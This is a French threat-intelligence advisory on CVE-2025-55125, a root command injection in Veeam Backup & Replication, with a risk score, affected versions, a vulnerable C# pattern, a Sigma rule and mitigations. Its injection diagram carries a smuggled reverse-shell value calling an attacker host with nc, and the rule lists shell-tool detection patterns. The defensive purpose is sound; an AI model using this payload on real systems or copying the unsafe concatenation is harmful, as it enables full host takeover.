Aller au contenu

CVE-2025-55125 : injection de commandes root via configuration de sauvegarde dans Veeam Backup & Replication

HERMES

HERMES THREAT SCORE & RISQUE DE GESTION DE CONFIGURATION

Cible : Composant d'importation et validation des configurations de sauvegarde Veeam
Confiance : 98%
86 / 100
ÉLEVÉ

Mesure la pertinence opérationnelle réelle, la militarisation de l'exploit et la posture de menace active.

Décomposition des dimensions
Exploitabilité 18 / 20
Activité de menace 16 / 20
Militarisation 18 / 20
Exposition 16 / 20
Prévalence 19 / 20
Impact 20 / 20
Maturité de l'exploit 17 / 20
Potentiel d'attaque en chaîne 20 / 20
⚖️ Divergence & Justification opérationnelle

Hermes évalue la CVE-2025-55125 à un HTS de 86 (ÉLEVÉ). Cette faille autorise un compte opérateur non administrateur à acquérir les privilèges root sur les serveurs de sauvegarde Linux ou les proxies distants. L'injection réside directement dans le désérialiseur de configuration de tâches, permettant une élévation de privilèges radicale à partir d'un simple accès restreint.

🕸️ Graphe de connaissances connecté & Provenance

CVE-2025-55125: Root Command Injection via Backup Configuration in Veeam Backup & ReplicationVULNÉRABILITÉ

Nœuds connectés : 1
Relations sortantes actives
→ affectsCOMPOSANTVeeam Backup & Replication
98% VERY_HIGH

Software platform affected by security vulnerabilities and agentic attack patterns.

🔍 Pourquoi cette relation ? (Preuves & Provenance)

“Confirmed security vulnerability in Veeam Backup & Replication documented in Hermes dossier.”

Preuves vérifiées associées :

ParamètreSpécification techniqueImpact opérationnel
Identifiant CVECVE-2025-55125Identifiant officiel NVD / MITRE
Avis de sécurité éditeurVeeam KB4716Correctif cumulatif pour VBR v13
Sous-système affectéConfiguration Engine / Job Template IngestionTraitement des configurations de sauvegarde
Versions affectéesVBR 13.x $\le$ 13.0.1.180Installations Linux et proxies renforcés
Version corrigéeVeeam Backup & Replication 13.0.1.1071Mise à niveau recommandée
Type de vulnérabilitéCWE-78 : OS Command InjectionÉlévation locale vers superutilisateur
Rôle minimal requisBackup Operator ou Tape OperatorAccès restreint au plan de sauvegarde
Privilèges obtenusroot (Linux) / SYSTEM (Windows)Contrôle complet de l’hôte physique ou virtuel

Le moteur d’orchestration de sauvegarde permet d’associer des scripts de pré-gel (pre-freeze) et de post-dégel (post-thaw) lors de la création de sauvegardes cohérentes au niveau applicatif.

Chaîne d'injection de commandes dans la CVE-2025-55125 :
┌────────────────────────────────────────────────────────┐
│ Opérateur de sauvegarde (Backup Operator) │
└───────────────────────────┬────────────────────────────┘
│ Importation d'un modèle de configuration XML/JSON
│ Champ : ScriptPath = "/bin/true; nc -e /bin/sh 10.10.14.5 9001"
▼
┌────────────────────────────────────────────────────────┐
│ Service Veeam Backup (Exécution root) │
│ 1. Désérialisation du modèle de configuration │
│ 2. Passage du chemin vers Process.Start("/bin/sh") │
│ 3. Absence de validation stricte d'échappement │
└───────────────────────────┬────────────────────────────┘
│ Exécution du shell enfant
▼
┌────────────────────────────────────────────────────────┐
│ Shell root interactif obtenu par l'attaquant │
└────────────────────────────────────────────────────────┘

Lors de l’analyse du fichier de configuration importé, le parseur extrait les chaînes de paramètres associées aux scripts de quiescence sans vérifier qu’il s’agit de chemins d’accès statiques existants :

// Modèle de code vulnérable :
string scriptCommand = config.PreFreezeScript;
ProcessStartInfo psi = new ProcessStartInfo("/bin/sh", "-c " + scriptCommand) {
UseShellExecute = false,
RedirectStandardOutput = true
};
Process.Start(psi);

L’utilisation de -c couplée à la concaténation directe permet à n’importe quel opérateur d’insérer des séparateurs de commandes (;, &&, |) pour déclencher une exécution de code arbitraire immédiate avec les droits du service parent (root).


Règle Sigma : détection d’injection de commande shell par Veeam

Section intitulée « Règle Sigma : détection d’injection de commande shell par Veeam »
title: Injection de commande shell depuis le service Veeam
id: cve-2025-55125-veeam-cmd-injection
status: experimental
description: Détecte l'exécution d'interpréteurs de commandes enfants anormaux depuis les démons Veeam
references:
- https://www.veeam.com/kb4716
logsource:
category: process_creation
product: linux
detection:
selection:
ParentImage|endswith:
- '/veeamsvc'
- '/VeeamDeploymentService'
Image|endswith:
- '/bin/sh'
- '/bin/bash'
- '/usr/bin/nc'
- '/usr/bin/python3'
CommandLine|contains:
- ';'
- '&&'
- '|'
- 'nc -'
condition: selection
level: critical

  1. Application du correctif KB4716 : mettre à niveau les serveurs vers la version 13.0.1.1071.
  2. Désactivation des scripts pré/post personnalisés : dans les environnements à haute sécurité, interdire l’usage de scripts de pré-gel/dégel non signés via les stratégies de groupe Veeam.
  3. Audit des configurations importées : restreindre l’importation de fichiers de configuration aux seuls comptes administrateurs principaux.